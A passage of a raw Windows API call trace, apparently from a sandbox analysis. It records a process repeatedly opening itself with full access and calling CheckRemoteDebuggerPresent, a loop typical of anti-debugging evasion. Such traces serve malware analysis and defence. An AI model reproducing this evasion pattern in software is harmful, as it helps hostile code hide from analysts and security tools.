pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.179] GetCurrentProcessId () returned 0x530 [0169.179] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x364 [0169.179] GetExitCodeProcess (in: hProcess=0x364, lpExitCode=0x28a5428 | out: lpExitCode=0x28a5428*=0x103) returned 1 [0169.179] CheckRemoteDebuggerPresent (in: hProcess=0x364, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.180] GetCurrentProcessId () returned 0x530 [0169.180] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x368 [0169.180] GetExitCodeProcess (in: hProcess=0x368, lpExitCode=0x28a54e0 | out: lpExitCode=0x28a54e0*=0x103) returned 1 [0169.180] CheckRemoteDebuggerPresent (in: hProcess=0x368, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.180] GetCurrentProcessId () returned 0x530 [0169.180] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x36c [0169.180] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0x28a5598 | out: lpExitCode=0x28a5598*=0x103) returned 1 [0169.180] CheckRemoteDebuggerPresent (in: hProcess=0x36c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.180] GetCurrentProcessId () returned 0x530 [0169.180] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x370 [0169.180] GetExitCodeProcess (in: hProcess=0x370, lpExitCode=0x28a5650 | out: lpExitCode=0x28a5650*=0x103) returned 1 [0169.180] CheckRemoteDebuggerPresent (in: hProcess=0x370, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.181] GetCurrentProcessId () returned 0x530 [0169.181] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x374 [0169.181] GetExitCodeProcess (in: hProcess=0x374, lpExitCode=0x28a5708 | out: lpExitCode=0x28a5708*=0x103) returned 1 [0169.181] CheckRemoteDebuggerPresent (in: hProcess=0x374, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.181] GetCurrentProcessId () returned 0x530 [0169.181] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x378 [0169.181] GetExitCodeProcess (in: hProcess=0x378, lpExitCode=0x28a57c0 | out: lpExitCode=0x28a57c0*=0x103) returned 1 [0169.181] CheckRemoteDebuggerPresent (in: hProcess=0x378, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.181] GetCurrentProcessId () returned 0x530 [0169.181] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x37c [0169.181] GetExitCodeProcess (in: hProcess=0x37c, lpExitCode=0x28a5878 | out: lpExitCode=0x28a5878*=0x103) returned 1 [0169.181] CheckRemoteDebuggerPresent (in: hProcess=0x37c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.181] GetCurrentProcessId () returned 0x530 [0169.181] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x380 [0169.182] GetExitCodeProcess (in: hProcess=0x380, lpExitCode=0x28a5930 | out: lpExitCode=0x28a5930*=0x103) returned 1 [0169.182] CheckRemoteDebuggerPresent (in: hProcess=0x380, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.182] GetCurrentProcessId () returned 0x530 [0169.182] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x384 [0169.182] GetExitCodeProcess (in: hProcess=0x384, lpExitCode=0x28a59e8 | out: lpExitCode=0x28a59e8*=0x103) returned 1 [0169.182] CheckRemoteDebuggerPresent (in: hProcess=0x384, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.182] GetCurrentProcessId () returned 0x530 [0169.182] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x388 [0169.182] GetExitCodeProcess (in: hProcess=0x388, lpExitCode=0x28a5aa0 | out: lpExitCode=0x28a5aa0*=0x103) returned 1 [0169.182] CheckRemoteDebuggerPresent (in: hProcess=0x388, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.182] GetCurrentProcessId () returned 0x530 [0169.182] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x38c [0169.182] GetExitCodeProcess (in: hProcess=0x38c, lpExitCode=0x28a5b58 | out: lpExitCode=0x28a5b58*=0x103) returned 1 [0169.183] CheckRemoteDebuggerPresent (in: hProcess=0x38c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.183] GetCurrentProcessId () returned 0x530 [0169.183] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x390 [0169.183] GetExitCodeProcess (in: hProcess=0x390, lpExitCode=0x28a5c10 | out: lpExitCode=0x28a5c10*=0x103) returned 1 [0169.183] CheckRemoteDebuggerPresent (in: hProcess=0x390, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.183] GetCurrentProcessId () returned 0x530 [0169.183] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x394 [0169.183] GetExitCodeProcess (in: hProcess=0x394, lpExitCode=0x28a5cc8 | out: lpExitCode=0x28a5cc8*=0x103) returned 1 [0169.183] CheckRemoteDebuggerPresent (in: hProcess=0x394, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.183] GetCurrentProcessId () returned 0x530 [0169.183] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x398 [0169.183] GetExitCodeProcess (in: hProcess=0x398, lpExitCode=0x28a5d80 | out: lpExitCode=0x28a5d80*=0x103) returned 1 [0169.183] CheckRemoteDebuggerPresent (in: hProcess=0x398, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.184] GetCurrentProcessId () returned 0x530 [0169.184] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x39c [0169.184] GetExitCodeProcess (in: hProcess=0x39c, lpExitCode=0x28a5e38 | out: lpExitCode=0x28a5e38*=0x103) returned 1 [0169.184] CheckRemoteDebuggerPresent (in: hProcess=0x39c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.184] GetCurrentProcessId () returned 0x530 [0169.184] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3a0 [0169.184] GetExitCodeProcess (in: hProcess=0x3a0, lpExitCode=0x28a5ef0 | out: lpExitCode=0x28a5ef0*=0x103) returned 1 [0169.184] CheckRemoteDebuggerPresent (in: hProcess=0x3a0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.184] GetCurrentProcessId () returned 0x530 [0169.184] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3a4 [0169.184] GetExitCodeProcess (in: hProcess=0x3a4, lpExitCode=0x28a5fa8 | out: lpExitCode=0x28a5fa8*=0x103) returned 1 [0169.184] CheckRemoteDebuggerPresent (in: hProcess=0x3a4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.184] GetCurrentProcessId () returned 0x530 [0169.184] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3a8 [0169.185] GetExitCodeProcess (in: hProcess=0x3a8, lpExitCode=0x28a6060 | out: lpExitCode=0x28a6060*=0x103) returned 1 [0169.185] CheckRemoteDebuggerPresent (in: hProcess=0x3a8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.185] GetCurrentProcessId () returned 0x530 [0169.185] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3ac [0169.185] GetExitCodeProcess (in: hProcess=0x3ac, lpExitCode=0x28a6118 | out: lpExitCode=0x28a6118*=0x103) returned 1 [0169.185] CheckRemoteDebuggerPresent (in: hProcess=0x3ac, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.185] GetCurrentProcessId () returned 0x530 [0169.185] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3b0 [0169.185] GetExitCodeProcess (in: hProcess=0x3b0, lpExitCode=0x28a61d0 | out: lpExitCode=0x28a61d0*=0x103) returned 1 [0169.185] CheckRemoteDebuggerPresent (in: hProcess=0x3b0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.185] GetCurrentProcessId () returned 0x530 [0169.185] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3b4 [0169.185] GetExitCodeProcess (in: hProcess=0x3b4, lpExitCode=0x28a6288 | out: lpExitCode=0x28a6288*=0x103) returned 1 [0169.186] CheckRemoteDebuggerPresent (in: hProcess=0x3b4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.186] GetCurrentProcessId () returned 0x530 [0169.186] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3b8 [0169.186] GetExitCodeProcess (in: hProcess=0x3b8, lpExitCode=0x28a6340 | out: lpExitCode=0x28a6340*=0x103) returned 1 [0169.186] CheckRemoteDebuggerPresent (in: hProcess=0x3b8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.186] GetCurrentProcessId () returned 0x530 [0169.186] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3bc [0169.186] GetExitCodeProcess (in: hProcess=0x3bc, lpExitCode=0x28a63f8 | out: lpExitCode=0x28a63f8*=0x103) returned 1 [0169.186] CheckRemoteDebuggerPresent (in: hProcess=0x3bc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.186] GetCurrentProcessId () returned 0x530 [0169.186] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3c0 [0169.186] GetExitCodeProcess (in: hProcess=0x3c0, lpExitCode=0x28a64b0 | out: lpExitCode=0x28a64b0*=0x103) returned 1 [0169.187] CheckRemoteDebuggerPresent (in: hProcess=0x3c0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.187] GetCurrentProcessId () returned 0x530 [0169.187] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3c4 [0169.187] GetExitCodeProcess (in: hProcess=0x3c4, lpExitCode=0x28a6568 | out: lpExitCode=0x28a6568*=0x103) returned 1 [0169.187] CheckRemoteDebuggerPresent (in: hProcess=0x3c4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.187] GetCurrentProcessId () returned 0x530 [0169.187] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3c8 [0169.187] GetExitCodeProcess (in: hProcess=0x3c8, lpExitCode=0x28a6620 | out: lpExitCode=0x28a6620*=0x103) returned 1 [0169.187] CheckRemoteDebuggerPresent (in: hProcess=0x3c8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.187] GetCurrentProcessId () returned 0x530 [0169.187] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3cc [0169.187] GetExitCodeProcess (in: hProcess=0x3cc, lpExitCode=0x28a66d8 | out: lpExitCode=0x28a66d8*=0x103) returned 1 [0169.187] CheckRemoteDebuggerPresent (in: hProcess=0x3cc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.187] GetCurrentProcessId () returned 0x530 [0169.188] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3d0 [0169.188] GetExitCodeProcess (in: hProcess=0x3d0, lpExitCode=0x28a6790 | out: lpExitCode=0x28a6790*=0x103) returned 1 [0169.188] CheckRemoteDebuggerPresent (in: hProcess=0x3d0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.188] GetCurrentProcessId () returned 0x530 [0169.188] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3d4 [0169.188] GetExitCodeProcess (in: hProcess=0x3d4, lpExitCode=0x28a6848 | out: lpExitCode=0x28a6848*=0x103) returned 1 [0169.188] CheckRemoteDebuggerPresent (in: hProcess=0x3d4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.188] GetCurrentProcessId () returned 0x530 [0169.188] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3d8 [0169.188] GetExitCodeProcess (in: hProcess=0x3d8, lpExitCode=0x28a6900 | out: lpExitCode=0x28a6900*=0x103) returned 1 [0169.188] CheckRemoteDebuggerPresent (in: hProcess=0x3d8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.188] GetCurrentProcessId () returned 0x530 [0169.189] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3dc [0169.189] GetExitCodeProcess (in: hProcess=0x3dc, lpExitCode=0x28a69b8 | out: lpExitCode=0x28a69b8*=0x103) returned 1 [0169.189] CheckRemoteDebuggerPresent (in: hProcess=0x3dc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.189] GetCurrentProcessId () returned 0x530 [0169.189] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3e0 [0169.189] GetExitCodeProcess (in: hProcess=0x3e0, lpExitCode=0x28a6a70 | out: lpExitCode=0x28a6a70*=0x103) returned 1 [0169.189] CheckRemoteDebuggerPresent (in: hProcess=0x3e0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.189] GetCurrentProcessId () returned 0x530 [0169.189] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3e4 [0169.189] GetExitCodeProcess (in: hProcess=0x3e4, lpExitCode=0x28a6b28 | out: lpExitCode=0x28a6b28*=0x103) returned 1 [0169.189] CheckRemoteDebuggerPresent (in: hProcess=0x3e4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.189] GetCurrentProcessId () returned 0x530 [0169.190] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3e8 [0169.190] GetExitCodeProcess (in: hProcess=0x3e8, lpExitCode=0x28a6be0 | out: lpExitCode=0x28a6be0*=0x103) returned 1 [0169.190] CheckRemoteDebuggerPresent (in: hProcess=0x3e8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.190] GetCurrentProcessId () returned 0x530 [0169.190] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3ec [0169.190] GetExitCodeProcess (in: hProcess=0x3ec, lpExitCode=0x28a6c98 | out: lpExitCode=0x28a6c98*=0x103) returned 1 [0169.190] CheckRemoteDebuggerPresent (in: hProcess=0x3ec, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.190] GetCurrentProcessId () returned 0x530 [0169.190] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3f0 [0169.190] GetExitCodeProcess (in: hProcess=0x3f0, lpExitCode=0x28a6d50 | out: lpExitCode=0x28a6d50*=0x103) returned 1 [0169.190] CheckRemoteDebuggerPresent (in: hProcess=0x3f0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.190] GetCurrentProcessId () returned 0x530 [0169.190] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3f4 [0169.191] GetExitCodeProcess (in: hProcess=0x3f4, lpExitCode=0x28a6e08 | out: lpExitCode=0x28a6e08*=0x103) returned 1 [0169.191] CheckRemoteDebuggerPresent (in: hProcess=0x3f4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.191] GetCurrentProcessId () returned 0x530 [0169.191] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3f8 [0169.191] GetExitCodeProcess (in: hProcess=0x3f8, lpExitCode=0x28a6ec0 | out: lpExitCode=0x28a6ec0*=0x103) returned 1 [0169.191] CheckRemoteDebuggerPresent (in: hProcess=0x3f8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.191] GetCurrentProcessId () returned 0x530 [0169.191] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3fc [0169.191] GetExitCodeProcess (in: hProcess=0x3fc, lpExitCode=0x28a6f78 | out: lpExitCode=0x28a6f78*=0x103) returned 1 [0169.191] CheckRemoteDebuggerPresent (in: hProcess=0x3fc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.191] GetCurrentProcessId () returned 0x530 [0169.191] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x404 [0169.192] GetExitCodeProcess (in: hProcess=0x404, lpExitCode=0x28a7030 | out: lpExitCode=0x28a7030*=0x103) returned 1 [0169.192] CheckRemoteDebuggerPresent (in: hProcess=0x404, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.192] GetCurrentProcessId () returned 0x530 [0169.192] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x408 [0169.192] GetExitCodeProcess (in: hProcess=0x408, lpExitCode=0x28a70e8 | out: lpExitCode=0x28a70e8*=0x103) returned 1 [0169.192] CheckRemoteDebuggerPresent (in: hProcess=0x408, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.192] GetCurrentProcessId () returned 0x530 [0169.192] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x40c [0169.192] GetExitCodeProcess (in: hProcess=0x40c, lpExitCode=0x28a71a0 | out: lpExitCode=0x28a71a0*=0x103) returned 1 [0169.192] CheckRemoteDebuggerPresent (in: hProcess=0x40c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.192] GetCurrentProcessId () returned 0x530 [0169.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x410 [0169.193] GetExitCodeProcess (in: hProcess=0x410, lpExitCode=0x28a7258 | out: lpExitCode=0x28a7258*=0x103) returned 1 [0169.193] CheckRemoteDebuggerPresent (in: hProcess=0x410, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.193] GetCurrentProcessId () returned 0x530 [0169.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x414 [0169.193] GetExitCodeProcess (in: hProcess=0x414, lpExitCode=0x28a7310 | out: lpExitCode=0x28a7310*=0x103) returned 1 [0169.193] CheckRemoteDebuggerPresent (in: hProcess=0x414, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.193] GetCurrentProcessId () returned 0x530 [0169.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x418 [0169.193] GetExitCodeProcess (in: hProcess=0x418, lpExitCode=0x28a73c8 | out: lpExitCode=0x28a73c8*=0x103) returned 1 [0169.193] CheckRemoteDebuggerPresent (in: hProcess=0x418, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.193] GetCurrentProcessId () returned 0x530 [0169.193] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x41c [0169.194] GetExitCodeProcess (in: hProcess=0x41c, lpExitCode=0x28a7480 | out: lpExitCode=0x28a7480*=0x103) returned 1 [0169.194] CheckRemoteDebuggerPresent (in: hProcess=0x41c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.194] GetExitCodeProcess (in: hProcess=0x420, lpExitCode=0x28a7538 | out: lpExitCode=0x28a7538*=0x103) returned 1 [0169.194] CheckRemoteDebuggerPresent (in: hProcess=0x420, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.194] GetExitCodeProcess (in: hProcess=0x424, lpExitCode=0x28a75f0 | out: lpExitCode=0x28a75f0*=0x103) returned 1 [0169.195] CheckRemoteDebuggerPresent (in: hProcess=0x424, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.195] GetExitCodeProcess (in: hProcess=0x428, lpExitCode=0x28a76a8 | out: lpExitCode=0x28a76a8*=0x103) returned 1 [0169.195] CheckRemoteDebuggerPresent (in: hProcess=0x428, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.195] GetExitCodeProcess (in: hProcess=0x42c, lpExitCode=0x28a7760 | out: lpExitCode=0x28a7760*=0x103) returned 1 [0169.195] CheckRemoteDebuggerPresent (in: hProcess=0x42c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.195] GetExitCodeProcess (in: hProcess=0x430, lpExitCode=0x28a7818 | out: lpExitCode=0x28a7818*=0x103) returned 1 [0169.195] CheckRemoteDebuggerPresent (in: hProcess=0x430, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.195] GetExitCodeProcess (in: hProcess=0x434, lpExitCode=0x28a78d0 | out: lpExitCode=0x28a78d0*=0x103) returned 1 [0169.195] CheckRemoteDebuggerPresent (in: hProcess=0x434, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.195] GetCurrentProcessId () returned 0x530 [0169.195] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x438 [0169.196] GetExitCodeProcess (in: hProcess=0x438, lpExitCode=0x28a79d8 | out: lpExitCode=0x28a79d8*=0x103) returned 1 [0169.196] CheckRemoteDebuggerPresent (in: hProcess=0x438, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.196] GetExitCodeProcess (in: hProcess=0x43c, lpExitCode=0x28a7a90 | out: lpExitCode=0x28a7a90*=0x103) returned 1 [0169.196] CheckRemoteDebuggerPresent (in: hProcess=0x43c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.196] GetCurrentProcessId () returned 0x530 [0169.196] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x440 [0169.196] GetExitCodeProcess (in: hProcess=0x440, lpExitCode=0x28a7b48 | out: lpExitCode=0x28a7b48*=0x103) returned 1 [0169.196] CheckRemoteDebuggerPresent (in: hProcess=0x440, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.196] GetExitCodeProcess (in: hProcess=0x444, lpExitCode=0x28a7c00 | out: lpExitCode=0x28a7c00*=0x103) returned 1 [0169.196] CheckRemoteDebuggerPresent (in: hProcess=0x444, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x448, lpExitCode=0x28a7cb8 | out: lpExitCode=0x28a7cb8*=0x103) returned 1 [0169.197] CheckRemoteDebuggerPresent (in: hProcess=0x448, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x44c, lpExitCode=0x28a7d70 | out: lpExitCode=0x28a7d70*=0x103) returned 1 [0169.197] CheckRemoteDebuggerPresent (in: hProcess=0x44c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x450, lpExitCode=0x28a7e28 | out: lpExitCode=0x28a7e28*=0x103) returned 1 [0169.197] CheckRemoteDebuggerPresent (in: hProcess=0x450, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x454, lpExitCode=0x28a7ee0 | out: lpExitCode=0x28a7ee0*=0x103) returned 1 [0169.197] CheckRemoteDebuggerPresent (in: hProcess=0x454, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x458, lpExitCode=0x28a7f98 | out: lpExitCode=0x28a7f98*=0x103) returned 1 [0169.197] CheckRemoteDebuggerPresent (in: hProcess=0x458, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.197] GetExitCodeProcess (in: hProcess=0x45c, lpExitCode=0x28a8050 | out: lpExitCode=0x28a8050*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x45c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.198] GetExitCodeProcess (in: hProcess=0x460, lpExitCode=0x28a8108 | out: lpExitCode=0x28a8108*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x460, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.198] GetExitCodeProcess (in: hProcess=0x464, lpExitCode=0x28a81c0 | out: lpExitCode=0x28a81c0*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x464, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.198] GetExitCodeProcess (in: hProcess=0x468, lpExitCode=0x28a8278 | out: lpExitCode=0x28a8278*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x468, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.198] GetExitCodeProcess (in: hProcess=0x46c, lpExitCode=0x28a8330 | out: lpExitCode=0x28a8330*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x46c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.198] GetExitCodeProcess (in: hProcess=0x470, lpExitCode=0x28a83e8 | out: lpExitCode=0x28a83e8*=0x103) returned 1 [0169.198] CheckRemoteDebuggerPresent (in: hProcess=0x470, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x474, lpExitCode=0x28a84a0 | out: lpExitCode=0x28a84a0*=0x103) returned 1 [0169.199] CheckRemoteDebuggerPresent (in: hProcess=0x474, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x478, lpExitCode=0x28a8558 | out: lpExitCode=0x28a8558*=0x103) returned 1 [0169.199] CheckRemoteDebuggerPresent (in: hProcess=0x478, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x47c, lpExitCode=0x28a8610 | out: lpExitCode=0x28a8610*=0x103) returned 1 [0169.199] CheckRemoteDebuggerPresent (in: hProcess=0x47c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x480, lpExitCode=0x28a86c8 | out: lpExitCode=0x28a86c8*=0x103) returned 1 [0169.199] CheckRemoteDebuggerPresent (in: hProcess=0x480, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x484, lpExitCode=0x28a8780 | out: lpExitCode=0x28a8780*=0x103) returned 1 [0169.199] CheckRemoteDebuggerPresent (in: hProcess=0x484, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.199] GetExitCodeProcess (in: hProcess=0x488, lpExitCode=0x28a8838 | out: lpExitCode=0x28a8838*=0x103) returned 1 [0169.200] CheckRemoteDebuggerPresent (in: hProcess=0x488, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.200] GetExitCodeProcess (in: hProcess=0x48c, lpExitCode=0x28a88f0 | out: lpExitCode=0x28a88f0*=0x103) returned 1 [0169.200] CheckRemoteDebuggerPresent (in: hProcess=0x48c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.200] GetExitCodeProcess (in: hProcess=0x490, lpExitCode=0x28a89a8 | out: 